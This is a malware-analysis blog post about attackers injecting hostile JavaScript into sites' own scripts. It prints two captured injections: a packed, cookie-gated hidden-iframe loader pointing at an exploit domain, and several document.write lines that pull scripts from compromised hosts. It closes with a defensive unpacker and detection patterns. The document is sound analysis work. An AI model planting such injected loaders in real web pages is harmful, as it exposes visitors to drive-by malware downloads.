When Benign scripts attack – II

    A few weeks back I wrote about how attackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post on this issue we saw how commonly deployed scripts such as jQuery, AC_RunActiveContent, mootools and others were being targeted. This time we will look at an injection into a script that does not fit that pattern.

    This particular script is not a popular, widely deployed library; it was most likely hand-coded by a developer for the site's own purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code in one of the JavaScript files that the page pulls in from its own server. Interestingly, the injected code is packed in a format resembling the popular Dean Edwards packer. Unpacking it is trivial, so the code that was not part of the original file is also shown below in unpacked form.

    // defines for sections
    var SECTION_LOGIN    = 0;
    var SECTION_MAIL     = 1;
    
    // defines for screens
    var SCREEN_LOGIN              = 0;
    var SCREEN_MESSAGES_LIST_VIEW = 1;
    var SCREEN_MESSAGES_LIST      = 2;
    var SCREEN_VIEW_MESSAGE       = 3;
    var SCREEN_NEW_MESSAGE        = 4;
    
    var Sections = Array();
    Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
    Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
    Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
    Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';
    
    **code removed for brevity**
    
    var REDRAW_NOTHING = 0;
    var REDRAW_PAGE    = 3;
    var AUTOSELECT_CHARSET = -1;
    var VIEW_MODE_WITH_PANE     = 1;
    var Fonts = ['Arial', 'Arial Black', 'Courier New', 'Tahoma', 'Times New Roman', 'Verdana'];
    
    Ready(INIT_DEFINES);
    
    **malicious code**
    
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k){p=p.replace(new RegExp(be(c)b,g),k)}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));
    
    **unpacked form**
    
    var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}
    

    Our systems flagged this as unsafe; for further validation one can look up the domain in the Malware Domain List, which carries the following entry:

    2009/03/28_00:00 loading-atm.net/b2b/ 83.133.123.140 t490.1paket.com redirects to exploits Jsfgvbg (loading-atm@mail.ru) 13237

    The exploit appears to drop an executable onto the victim's system, which in turn is a downloader that tries to fetch two more files from the same domain.

    And to whet your appetite further, here is another example captured from hxxp://www. aikidoofqueens. com/kids/

    var ma=new Array();var mx=new Array();var my=new Array();var mc=new Array();
    var mpos=new Array();var mal=0;var main=0;var menuw=200;var psrc=0;
    var pname="";var al="";var gd=0;var gx,gy;var d=document;
    var NS7=(!d.all&&d.getElementById);var NS4=(!d.getElementById);
    var IE5=(!NS4&&!NS7&&(navigator.userAgent.indexOf('MSIE 5.0')!=-1
    ||navigator.userAgent.indexOf('MSIE 5.2')!=-1));var IE5p5=(!NS4&&
    !NS7&&navigator.userAgent.indexOf('MSIE 5.5')!=-1);var NS6=(NS7&&
    navigator.userAgent.indexOf('Netscape6')!=-1);
    var SAF=navigator.userAgent.indexOf('Safari')!=-1;p=navigator.userAgent.indexOf('Opera');
    if(p>-1){p=navigator.userAgent.charAt(p+6);if(p>6)NS7=1;else NS4=1;}var 
    
    ** code removed for brevity **
    
    clipMenu(i,el){if(el.offsetLeft>mx[i])el.style.clip="rect("+(my[i]-el.offsetTop)+"px "
    +(el.offsetWidth+(mx[i]-el.offsetLeft))+"px "+el.offsetHeight+"px "+0+"px)";
    else el.style.clip="rect("+(my[i]-el.offsetTop)+"px "+el.offsetWidth+"px "+
    el.offsetHeight+"px "+(mx[i]-el.offsetLeft)+"px)";}
    
    ** malicious code **
    
    document.write('< script src=hxxp://b olccorlando.org/_vti_txt/event_pwf.php ><\/s cript>');
    document.write('<sc ript src=hxxp://gh anafoneshop.com/category_images/vieworder.php ><\/s cript>');
    document.write('<scr ipt src=hxxp://gha nafoneshop.com/category_images/vieworder.php ><\/sc ript>');
    document.write('<scri pt src=hxxp://ghan afoneshop.com/category_images/vieworder.php ><\/scr ipt>');
    document.write('<scrip t src=hxxp://ghana foneshop.com/category_images/vieworder.php ><\/scri pt>');
    document.write('<sc ript src=hxxp://ghanaf oneshop.com/category_images/vieworder.php ><\/scrip t>');
    document.write('<scr ipt src=hxxp://ramazan -toker.com/images/gifimg.php ><\/sc ript>');
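Both injections above can be triaged without ever running the sample. The block below is an added example, not code from the original post or from either compromised site: it replays the Dean Edwards "p,a,c,k,e,d" substitution loop by plain string replacement (no eval), then runs a few indicator checks for the hidden-iframe write, the cookie gate and the document.write of remote script tags. The packed sample and the example.invalid host are constructed for this example.

```javascript
// Argument tail of the packer wrapper: }('<p>', <a>, <c>, '<k>'.split('|'), ...
const TAIL = /\}\('((?:\\.|[^'\\])*)',\s*(\d+),\s*(\d+),\s*'((?:\\.|[^'\\])*)'\.split\('\|'\)/;

// Dean Edwards' index encoder: 0-9, a-z, then A-Z when the base exceeds 36.
function encodeIndex(c, a) {
  const head = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const r = c % a;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Replay the unpacker: from the highest dictionary index down, replace each
// whole-word token with its dictionary entry. Returns null if no wrapper is found.
function unpackPacker(source) {
  const m = TAIL.exec(source);
  if (!m) return null;
  let p = m[1].replace(/\\'/g, "'");   // only the escaped single quote is undone here
  const a = Number(m[2]);
  let c = Number(m[3]);
  const k = m[4].split('|');
  while (c--) {
    if (k[c]) p = p.replace(new RegExp('\\b' + encodeIndex(c, a) + '\\b', 'g'), k[c]);
  }
  return p;
}

// Indicators matching the two injection styles discussed in the post.
const INDICATORS = {
  hiddenIframeWrite: /document\.write\([^)]*<iframe[^)]*display:\s*none/i,
  remoteScriptWrite: /document\.write\(['"]<\s*script[^'"]*src=/i,
  cookieGate: /document\.cookie\.indexOf\(/,
};
function indicators(js) {
  return Object.keys(INDICATORS).filter((name) => INDICATORS[name].test(js));
}

// Constructed packed sample in the same wrapper format as the post's snippet
// (packer body elided; the unpacker only needs the argument tail).
const SAMPLE = `eval(function(p,a,c,k,e,d){/* elided */}('2 3=4 5();6(0.7.8("9=f")==-1){0.a("<b c=1 d=1 e=g://h.i/ j=k:l></b>")}',36,22,'document||var|today|new|Date|if|cookie|indexOf|_df|write|iframe|width|height|src||http|example|invalid|style|display|none'.split('|'),0,{}))`;

const unpacked = unpackPacker(SAMPLE);
console.log(unpacked);
console.log(indicators(unpacked));
```

Feed a suspect file to unpackPacker first, then run indicators over both the raw and the unpacked text, since the script-tag injection in the second example is not packed at all.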